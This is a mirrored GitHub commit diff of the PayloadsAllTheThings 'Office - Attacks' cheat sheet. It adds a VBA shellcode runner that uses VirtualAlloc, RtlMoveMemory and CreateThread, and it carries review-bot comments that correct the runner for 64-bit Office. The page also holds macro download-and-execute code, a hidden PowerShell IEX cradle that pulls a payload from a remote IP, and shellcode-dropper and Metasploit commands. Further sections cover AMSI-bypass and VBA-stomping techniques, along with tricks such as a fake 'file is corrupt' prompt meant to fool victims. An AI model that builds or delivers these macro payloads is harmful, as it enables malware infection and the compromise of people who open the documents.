mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-24 05:15:26 +00:00
Add Office execute WinAPI via VBA
This commit is contained in:
parent
47df1695a1
commit
2a4ce78080
@ -1,9 +1,10 @@
|
|||||||
# Office - Attacks
|
# Office - Attacks
|
||||||
|
|
||||||
## Summary
|
### Summary
|
||||||
|
|
||||||
* [Office Products Features](#office-products-features)
|
* [Office Products Features](#office-products-features)
|
||||||
* [Office Default Passwords](#office-default-passwords)
|
* [Office Default Passwords](#office-default-passwords)
|
||||||
|
* [Office Macro execute WinAPI](#office-macro-execute-winapi)
|
||||||
* [Excel](#excel)
|
* [Excel](#excel)
|
||||||
* [XLSM - Hot Manchego](#xlsm---hot-manchego)
|
* [XLSM - Hot Manchego](#xlsm---hot-manchego)
|
||||||
* [XLS - Macrome](#xls---macrome)
|
* [XLS - Macrome](#xls---macrome)
|
||||||
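Review bot: the Summary entry `* [XLS - Macrome](#xls---macrome)` kept in this hunk does not match the body heading it should point to, `XLM - Macrome` (anchor `#xlm---macrome`), which a later hunk in this same commit demotes; since the Summary is already being edited here, rename the entry to `XLM - Macrome` and its anchor to `#xlm---macrome` so the link resolves. Second, `## Summary` is demoted to `### Summary` although, unlike every other demoted heading, it gains no `##` parent (the new `## Excel` and `## Word` parents only cover the sections below it), so `## Summary` directly under `# Office - Attacks` is the consistent level. The new bullet `* [Office Macro execute WinAPI](#office-macro-execute-winapi)` matches the heading added in the next hunk and is fine.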
@ -51,8 +52,55 @@ By default, Excel does not set a password when saving a new file. However, some
|
|||||||
| Excel | VelvetSweatshop | all Excel formats |
|
| Excel | VelvetSweatshop | all Excel formats |
|
||||||
| PowerPoint | 01Hannes Ruescher/01 | .pps .ppt |
|
| PowerPoint | 01Hannes Ruescher/01 | .pps .ppt |
|
||||||
|
|
||||||
|
## Office Macro execute WinAPI
|
||||||
|
|
||||||
## XLSM - Hot Manchego
|
### Description
|
||||||
|
|
||||||
|
To importe Win32 function we need to use the keyword `Private Declare`
|
||||||
|
`Private Declare Function <NAME> Lib "<DLL_NAME>" Alias "<FUNCTION_IMPORTED>" (<ByVal/ByRef> <NAME_VAR> As <TYPE>, etc.) As <TYPE>`
|
||||||
|
If we work on 64bit, we need to add the keyword `PtrSafe` between the keywords `Declare` and `Function`
|
||||||
|
Importing the `GetUserNameA` from `advapi32.dll`:
|
||||||
|
```VBA
|
||||||
|
Private Declare PtrSafe Function GetUserName Lib "advapi32.dll" Alias "GetUserNameA" (ByVal lpBuffer As String, ByRef nSize As Long) As Long
|
||||||
|
```
|
||||||
|
`GetUserNameA` prototype in C:
|
||||||
|
```C
|
||||||
|
BOOL GetUserNameA(
|
||||||
|
LPSTR lpBuffer,
|
||||||
|
LPDWORD pcbBuffer
|
||||||
|
);
|
||||||
|
```
|
||||||
|
### Example with a simple Shellcode Runner
|
||||||
|
```VBA
|
||||||
|
Private Declare PtrSafe Function VirtualAlloc Lib "Kernel32.dll" (ByVal lpAddress As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
|
||||||
|
Private Declare PtrSafe Function RtlMoveMemory Lib "Kernel32.dll" (ByVal lDestination As LongPtr, ByRef sSource As Any, ByVal lLength As Long) As LongPtr
|
||||||
|
Private Declare PtrSafe Function CreateThread Lib "KERNEL32.dll" (ByVal SecurityAttributes As Long, ByVal StackSize As Long, ByVal StartFunction As LongPtr, ThreadParameter As LongPtr, ByVal CreateFlags As Long, ByRef ThreadId As Long) As LongPtr
|
||||||
|
|
||||||
|
Sub WinAPI()
|
||||||
|
Dim buf As Variant
|
||||||
|
Dim addr As LongPtr
|
||||||
|
Dim counter As Long
|
||||||
|
Dim data As Long
|
||||||
|
|
||||||
|
buf = Array(252, ...)
|
||||||
|
|
||||||
|
addr = VirtualAlloc(0, UBound(buf), &H3000, &H40)
|
||||||
|
|
||||||
|
|
||||||
|
For counter = LBound(buf) To UBound(buf)
|
||||||
|
data = buf(counter)
|
||||||
|
res = RtlMoveMemory(addr + counter, data, 1)
|
||||||
|
Next counter
|
||||||
|
res = CreateThread(0, 0, addr, 0, 0, 0)
|
||||||
|
|
||||||
|
|
||||||
|
End Sub
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
## Excel
|
||||||
|
|
||||||
|
### XLSM - Hot Manchego
|
||||||
|
|
||||||
> When using EPPlus, the creation of the Excel document varied significantly enough that most A/V didn't catch a simple lolbas payload to get a beacon on a target machine.
|
> When using EPPlus, the creation of the Excel document varied significantly enough that most A/V didn't catch a simple lolbas payload to get a beacon on a target machine.
|
||||||
|
|
||||||
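Review bot: in the shellcode runner the `VirtualAlloc` Declare types `lpAddress` as `Long`, while every other pointer in the same block (`lDestination`, `StartFunction`, the three return values) is `LongPtr`; on 64-bit Office a `Long` is a 32-bit value, so the first parameter should be `ByVal lpAddress As LongPtr` to match. Smaller points in the same hunk: "To importe Win32 function we need to use the keyword `Private Declare`" should read "To import a Win32 function, use a `Declare` statement" (the `Private` is only the access modifier, not part of the import); "If we work on 64bit" is really about 64-bit Office (VBA7), since 32-bit Office on 64-bit Windows does not require `PtrSafe`; `VirtualAlloc(0, UBound(buf), &H3000, &H40)` requests one byte fewer than the `LBound`..`UBound` loop writes (`UBound(buf) - LBound(buf) + 1` is the byte count) and only works because the allocation is rounded up to a page; and `res` is never declared, so the sample fails under `Option Explicit`. Suggest `Dim res As LongPtr` alongside the other `Dim` lines, since `RtlMoveMemory` and `CreateThread` are declared to return `LongPtr`.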
@ -65,7 +113,7 @@ PS> C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /reference:EPPlus.dll
|
|||||||
PS> .\hot-manchego.exe .\blank.xlsm .\vba.txt
|
PS> .\hot-manchego.exe .\blank.xlsm .\vba.txt
|
||||||
```
|
```
|
||||||
|
|
||||||
## XLM - Macrome
|
### XLM - Macrome
|
||||||
|
|
||||||
> XOR Obfuscation technique will NOT work with VBA macros since VBA is stored in a different stream that will not be encrypted when you password protect the document. This only works for Excel 4.0 macros.
|
> XOR Obfuscation technique will NOT work with VBA macros since VBA is stored in a different stream that will not be encrypted when you password protect the document. This only works for Excel 4.0 macros.
|
||||||
|
|
||||||
@ -96,7 +144,7 @@ Macrome build --decoy-document decoy_document.xls --payload-type Macro --payload
|
|||||||
When using Macrome build mode, the --password flag may be used to encrypt the generated document using XOR Obfuscation. If the default password of **VelvetSweatshop** is used when building the document, all versions of Excel will automatically decrypt the document without any additional user input. This password can only be set in Excel 2003.
|
When using Macrome build mode, the --password flag may be used to encrypt the generated document using XOR Obfuscation. If the default password of **VelvetSweatshop** is used when building the document, all versions of Excel will automatically decrypt the document without any additional user input. This password can only be set in Excel 2003.
|
||||||
|
|
||||||
|
|
||||||
## XLM Excel 4.0 - SharpShooter
|
### XLM Excel 4.0 - SharpShooter
|
||||||
|
|
||||||
* https://github.com/mdsecactivebreach/SharpShooter
|
* https://github.com/mdsecactivebreach/SharpShooter
|
||||||
|
|
||||||
@ -120,7 +168,7 @@ SharpShooter.py --payload slk --output foo --rawscfile /tmp/shellcode-86.bin --s
|
|||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
## XLM Excel 4.0 - EXCELntDonut
|
### XLM Excel 4.0 - EXCELntDonut
|
||||||
|
|
||||||
* XLM (Excel 4.0) macros pre-date VBA and can be delivered in .xls files.
|
* XLM (Excel 4.0) macros pre-date VBA and can be delivered in .xls files.
|
||||||
* AMSI has no visibility into XLM macros (for now)
|
* AMSI has no visibility into XLM macros (for now)
|
||||||
@ -162,7 +210,7 @@ python3 drive.py --x64bin GruntHttpx64.bin --x86bin GruntHttpx86.bin
|
|||||||
XLM: https://github.com/Synzack/synzack.github.io/blob/3dd471d4f15db9e82c20e2f1391a7a598b456855/_posts/2020-05-25-Weaponizing-28-Year-Old-XLM-Macros.md
|
XLM: https://github.com/Synzack/synzack.github.io/blob/3dd471d4f15db9e82c20e2f1391a7a598b456855/_posts/2020-05-25-Weaponizing-28-Year-Old-XLM-Macros.md
|
||||||
|
|
||||||
|
|
||||||
## XLM Excel 4.0 - EXEC
|
### XLM Excel 4.0 - EXEC
|
||||||
|
|
||||||
1. Right Click to the current sheet
|
1. Right Click to the current sheet
|
||||||
2. Insert a **Macro IntL MS Excel 4.0**
|
2. Insert a **Macro IntL MS Excel 4.0**
|
||||||
@ -175,7 +223,7 @@ XLM: https://github.com/Synzack/synzack.github.io/blob/3dd471d4f15db9e82c20e2f13
|
|||||||
5. Hide your macro worksheet by a right mouse click on the sheet name **Macro1** and selecting **Hide**
|
5. Hide your macro worksheet by a right mouse click on the sheet name **Macro1** and selecting **Hide**
|
||||||
|
|
||||||
|
|
||||||
## SLK - EXEC
|
### SLK - EXEC
|
||||||
|
|
||||||
```ps1
|
```ps1
|
||||||
ID;P
|
ID;P
|
||||||
@ -186,8 +234,9 @@ C;X1;Y102;K0;EHALT()
|
|||||||
E
|
E
|
||||||
```
|
```
|
||||||
|
|
||||||
|
## Word
|
||||||
|
|
||||||
## DOCM - Metasploit
|
### DOCM - Metasploit
|
||||||
|
|
||||||
```ps1
|
```ps1
|
||||||
use exploit/multi/fileformat/office_word_macro
|
use exploit/multi/fileformat/office_word_macro
|
||||||
@ -200,7 +249,7 @@ set FILENAME Financial2021.docm
|
|||||||
exploit -j
|
exploit -j
|
||||||
```
|
```
|
||||||
|
|
||||||
## DOCM - Download and Execute
|
### DOCM - Download and Execute
|
||||||
|
|
||||||
> Detected by Defender (AMSI)
|
> Detected by Defender (AMSI)
|
||||||
|
|
||||||
@ -215,7 +264,7 @@ Execute
|
|||||||
End Sub
|
End Sub
|
||||||
```
|
```
|
||||||
|
|
||||||
## DOCM - Macro Creator
|
### DOCM - Macro Creator
|
||||||
|
|
||||||
* https://github.com/Arno0x/PowerShellScripts/tree/master/MacroCreator
|
* https://github.com/Arno0x/PowerShellScripts/tree/master/MacroCreator
|
||||||
|
|
||||||
@ -228,7 +277,7 @@ C:\PS> Invoke-MacroCreator -i meterpreter_shellcode.raw -t shellcode -url webdav
|
|||||||
C:\PS> Invoke-MacroCreator -i regsvr32.sct -t file -url 'http://my.server.com/sources.xml' -d biblio -c 'regsvr32 /u /n /s /i:regsvr32.sct scrobj.dll' -o -e
|
C:\PS> Invoke-MacroCreator -i regsvr32.sct -t file -url 'http://my.server.com/sources.xml' -d biblio -c 'regsvr32 /u /n /s /i:regsvr32.sct scrobj.dll' -o -e
|
||||||
```
|
```
|
||||||
|
|
||||||
## DOCM - C# converted to Office VBA macro
|
### DOCM - C# converted to Office VBA macro
|
||||||
|
|
||||||
> A message will prompt to the user saying that the file is corrupt and automatically close the excel document. THIS IS NORMAL BEHAVIOR! This is tricking the victim to thinking the excel document is corrupted.
|
> A message will prompt to the user saying that the file is corrupt and automatically close the excel document. THIS IS NORMAL BEHAVIOR! This is tricking the victim to thinking the excel document is corrupted.
|
||||||
|
|
||||||
@ -238,7 +287,7 @@ https://github.com/trustedsec/unicorn
|
|||||||
python unicorn.py payload.cs cs macro
|
python unicorn.py payload.cs cs macro
|
||||||
```
|
```
|
||||||
|
|
||||||
## DOCM - VBA Wscript
|
### DOCM - VBA Wscript
|
||||||
|
|
||||||
> https://www.darkoperator.com/blog/2017/11/11/windows-defender-exploit-guard-asr-rules-for-office
|
> https://www.darkoperator.com/blog/2017/11/11/windows-defender-exploit-guard-asr-rules-for-office
|
||||||
|
|
||||||
@ -263,7 +312,7 @@ CreateObject("WScript.Shell").Exec "notepad.exe"
|
|||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
## DOCM - VBA Shell Execute Comment
|
### DOCM - VBA Shell Execute Comment
|
||||||
|
|
||||||
Set your command payload inside the **Comment** metadata of the document.
|
Set your command payload inside the **Comment** metadata of the document.
|
||||||
|
|
||||||
@ -287,7 +336,7 @@ End Sub
|
|||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
## DOCM - VBA Spawning via svchost.exe using Scheduled Task
|
### DOCM - VBA Spawning via svchost.exe using Scheduled Task
|
||||||
|
|
||||||
```ps1
|
```ps1
|
||||||
Sub AutoOpen()
|
Sub AutoOpen()
|
||||||
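Review bot: the fence that opens this VBA sample is tagged ```ps1 (context lines ```ps1 followed by `Sub AutoOpen()`), while the new "Office Macro execute WinAPI" section introduces the ```VBA tag for the same language; since this hunk already touches the section, retag the fence as VBA so highlighting is correct and the page uses one tag per language. The same ```ps1 tag appears on other VBA samples in this file (for example the one with `Rem powershell.exe -nop -w hidden ...` that follows), so a single pass over all of them would be cleaner than fixing one.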
@ -311,7 +360,7 @@ End Sub
|
|||||||
Rem powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.1.59:80/fezsdfqs'))"
|
Rem powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.1.59:80/fezsdfqs'))"
|
||||||
```
|
```
|
||||||
|
|
||||||
## DOCM - WMI COM functions
|
### DOCM - WMI COM functions
|
||||||
|
|
||||||
Basic WMI exec (detected by Defender) : `r = GetObject("winmgmts:\\.\root\cimv2:Win32_Process").Create("calc.exe", null, null, intProcessID)`
|
Basic WMI exec (detected by Defender) : `r = GetObject("winmgmts:\\.\root\cimv2:Win32_Process").Create("calc.exe", null, null, intProcessID)`
|
||||||
|
|
||||||
@ -357,7 +406,7 @@ Set SW = GetObject("new:" & ShellWindows).Item()
|
|||||||
SW.Document.Application.ShellExecute "cmd.exe", "/c powershell.exe", "C:\Windows\System32", Null, 0
|
SW.Document.Application.ShellExecute "cmd.exe", "/c powershell.exe", "C:\Windows\System32", Null, 0
|
||||||
```
|
```
|
||||||
|
|
||||||
## DOCM/XLM - Macro Pack - Macro and DDE
|
### DOCM/XLM - Macro Pack - Macro and DDE
|
||||||
|
|
||||||
> Only the community version is available online.
|
> Only the community version is available online.
|
||||||
|
|
||||||
@ -419,7 +468,7 @@ echo "x86.bin" "x64.bin" | macro_pack.exe -t AUTOSHELLCODE -o –autopack -G sc_
|
|||||||
echo "http://192.168.5.10:8080/x32calc.bin" "http://192.168.5.10:8080/x64calc.bin" | macro_pack.exe -t DROPPER_SHELLCODE -o --shellcodemethod=ClassicIndirect -G samples\sc_dl.xls
|
echo "http://192.168.5.10:8080/x32calc.bin" "http://192.168.5.10:8080/x64calc.bin" | macro_pack.exe -t DROPPER_SHELLCODE -o --shellcodemethod=ClassicIndirect -G samples\sc_dl.xls
|
||||||
```
|
```
|
||||||
|
|
||||||
## DOCM - BadAssMacros
|
### DOCM - BadAssMacros
|
||||||
|
|
||||||
> C# based automated Malicous Macro Generator.
|
> C# based automated Malicous Macro Generator.
|
||||||
|
|
||||||
@ -443,7 +492,7 @@ BadAssMacros.exe -i <path_to_doc/excel_file> -w <doc/excel> -p yes -o <path_to_o
|
|||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
## DOCM - CACTUSTORCH VBA Module
|
### DOCM - CACTUSTORCH VBA Module
|
||||||
|
|
||||||
> CactusTorch is leveraging the DotNetToJscript technique to load a .Net compiled binary into memory and execute it from vbscript
|
> CactusTorch is leveraging the DotNetToJscript technique to load a .Net compiled binary into memory and execute it from vbscript
|
||||||
|
|
||||||
@ -465,7 +514,7 @@ BadAssMacros.exe -i <path_to_doc/excel_file> -w <doc/excel> -p yes -o <path_to_o
|
|||||||
6. Use the generated code to replace the hardcoded binary in CactusTorch
|
6. Use the generated code to replace the hardcoded binary in CactusTorch
|
||||||
|
|
||||||
|
|
||||||
## DOCM - MMG with Custom DL + Exec
|
### DOCM - MMG with Custom DL + Exec
|
||||||
|
|
||||||
1. Custom Download in first Macro to "C:\\Users\\Public\\beacon.exe"
|
1. Custom Download in first Macro to "C:\\Users\\Public\\beacon.exe"
|
||||||
2. Create a custom binary execute using MMG
|
2. Create a custom binary execute using MMG
|
||||||
@ -514,7 +563,7 @@ Sub Auto_Open()
|
|||||||
End Sub
|
End Sub
|
||||||
```
|
```
|
||||||
|
|
||||||
## DOCM - ActiveX-based (InkPicture control, Painted event) Autorun macro
|
### DOCM - ActiveX-based (InkPicture control, Painted event) Autorun macro
|
||||||
|
|
||||||
Go to **Developer tab** on ribbon `-> Insert -> More Controls -> Microsoft InkPicture Control`
|
Go to **Developer tab** on ribbon `-> Insert -> More Controls -> Microsoft InkPicture Control`
|
||||||
|
|
||||||
@ -526,7 +575,7 @@ End Sub
|
|||||||
|
|
||||||
|
|
||||||
|
|
||||||
## VBA Obfuscation
|
### VBA Obfuscation
|
||||||
|
|
||||||
```ps1
|
```ps1
|
||||||
# https://www.youtube.com/watch?v=L0DlPOLx2k0
|
# https://www.youtube.com/watch?v=L0DlPOLx2k0
|
||||||
@ -534,13 +583,13 @@ $ git clone https://github.com/bonnetn/vba-obfuscator
|
|||||||
$ cat example_macro/download_payload.vba | docker run -i --rm bonnetn/vba-obfuscator /dev/stdin
|
$ cat example_macro/download_payload.vba | docker run -i --rm bonnetn/vba-obfuscator /dev/stdin
|
||||||
```
|
```
|
||||||
|
|
||||||
## VBA Purging
|
### VBA Purging
|
||||||
|
|
||||||
**VBA Stomping**: This technique allows attackers to remove compressed VBA code from Office documents and still execute malicious macros without many of the VBA keywords that AV engines had come to rely on for detection. == Removes P-code.
|
**VBA Stomping**: This technique allows attackers to remove compressed VBA code from Office documents and still execute malicious macros without many of the VBA keywords that AV engines had come to rely on for detection. == Removes P-code.
|
||||||
|
|
||||||
:warning: VBA stomping is not effective against Excel 97-2003 Workbook (.xls) format.
|
:warning: VBA stomping is not effective against Excel 97-2003 Workbook (.xls) format.
|
||||||
|
|
||||||
### OfficePurge
|
#### OfficePurge
|
||||||
* https://github.com/fireeye/OfficePurge/releases/download/v1.0/OfficePurge.exe
|
* https://github.com/fireeye/OfficePurge/releases/download/v1.0/OfficePurge.exe
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
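Review bot: demoting `## VBA Purging` to `###` (and `### OfficePurge` to `####`) files it under the new `## Word` parent introduced earlier in this commit, yet the section's own text says VBA stomping "is not effective against Excel 97-2003 Workbook (.xls) format", and the `OfficePurge.exe -d word -f .\malicious.doc -l` example implies a document-type switch that is not Word-only. The neighbouring `VBA Obfuscation` and `VBA - AMSI` sections are format-independent in the same way. Consider a dedicated `## VBA` parent for these generic sections rather than nesting them under Word, and give it a Summary entry.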
@ -551,7 +600,7 @@ OfficePurge.exe -d word -f .\malicious.doc -l
|
|||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
### EvilClippy
|
#### EvilClippy
|
||||||
|
|
||||||
> Evil Clippy uses the OpenMCDF library to manipulate CFBF files.
|
> Evil Clippy uses the OpenMCDF library to manipulate CFBF files.
|
||||||
> Evil Clippy compiles perfectly fine with the Mono C# compiler and has been tested on Linux, OSX and Windows.
|
> Evil Clippy compiles perfectly fine with the Mono C# compiler and has been tested on Linux, OSX and Windows.
|
||||||
@ -573,7 +622,7 @@ EvilClippy.exe -r macrofile.doc
|
|||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
## VBA - Offensive Security Template
|
### VBA - Offensive Security Template
|
||||||
|
|
||||||
* Reverse Shell VBA - https://github.com/JohnWoodman/VBA-Macro-Reverse-Shell/blob/main/VBA-Reverse-Shell.vba
|
* Reverse Shell VBA - https://github.com/JohnWoodman/VBA-Macro-Reverse-Shell/blob/main/VBA-Reverse-Shell.vba
|
||||||
* Process Dumper - https://github.com/JohnWoodman/VBA-Macro-Dump-Process
|
* Process Dumper - https://github.com/JohnWoodman/VBA-Macro-Dump-Process
|
||||||
@ -583,7 +632,7 @@ EvilClippy.exe -r macrofile.doc
|
|||||||
* amsiByPassWithRTLMoveMemory - https://gist.github.com/DanShaqFu/1c57c02660b2980d4816d14379c2c4f3
|
* amsiByPassWithRTLMoveMemory - https://gist.github.com/DanShaqFu/1c57c02660b2980d4816d14379c2c4f3
|
||||||
* VBA macro spawning a process with a spoofed parent - https://github.com/christophetd/spoofing-office-macro/blob/master/macro64.vba
|
* VBA macro spawning a process with a spoofed parent - https://github.com/christophetd/spoofing-office-macro/blob/master/macro64.vba
|
||||||
|
|
||||||
## VBA - AMSI
|
### VBA - AMSI
|
||||||
|
|
||||||
> The Office VBA integration with AMSI is made up of three parts: (a) logging macro behavior, (b) triggering a scan on suspicious behavior, and (c) stopping a malicious macro upon detection. https://www.microsoft.com/security/blog/2018/09/12/office-vba-amsi-parting-the-veil-on-malicious-macros/
|
> The Office VBA integration with AMSI is made up of three parts: (a) logging macro behavior, (b) triggering a scan on suspicious behavior, and (c) stopping a malicious macro upon detection. https://www.microsoft.com/security/blog/2018/09/12/office-vba-amsi-parting-the-veil-on-malicious-macros/
|
||||||
|
|
||||||
@ -625,11 +674,11 @@ Private Sub Document_Open()
|
|||||||
End Sub
|
End Sub
|
||||||
```
|
```
|
||||||
|
|
||||||
## DOCX - Template Injection
|
### DOCX - Template Injection
|
||||||
|
|
||||||
:warning: Does not require "Enable Macro"
|
:warning: Does not require "Enable Macro"
|
||||||
|
|
||||||
### Remote Template
|
#### Remote Template
|
||||||
|
|
||||||
1. A malicious macro is saved in a Word template .dotm file
|
1. A malicious macro is saved in a Word template .dotm file
|
||||||
2. Benign .docx file is created based on one of the default MS Word Document templates
|
2. Benign .docx file is created based on one of the default MS Word Document templates
|
||||||
@ -647,7 +696,7 @@ End Sub
|
|||||||
```
|
```
|
||||||
7. File gets zipped back up again and renamed to .docx
|
7. File gets zipped back up again and renamed to .docx
|
||||||
|
|
||||||
### Template Injections Tools
|
#### Template Injections Tools
|
||||||
|
|
||||||
* https://github.com/JohnWoodman/remoteInjector
|
* https://github.com/JohnWoodman/remoteInjector
|
||||||
* https://github.com/ryhanson/phishery
|
* https://github.com/ryhanson/phishery
|
||||||
@ -661,7 +710,7 @@ $ phishery -u https://secure.site.local/docs -i good.docx -o bad.docx
|
|||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
## DOCX - DDE
|
### DOCX - DDE
|
||||||
|
|
||||||
* Insert > QuickPart > Field
|
* Insert > QuickPart > Field
|
||||||
* Right Click > Toggle Field Code
|
* Right Click > Toggle Field Code
|
||||||
|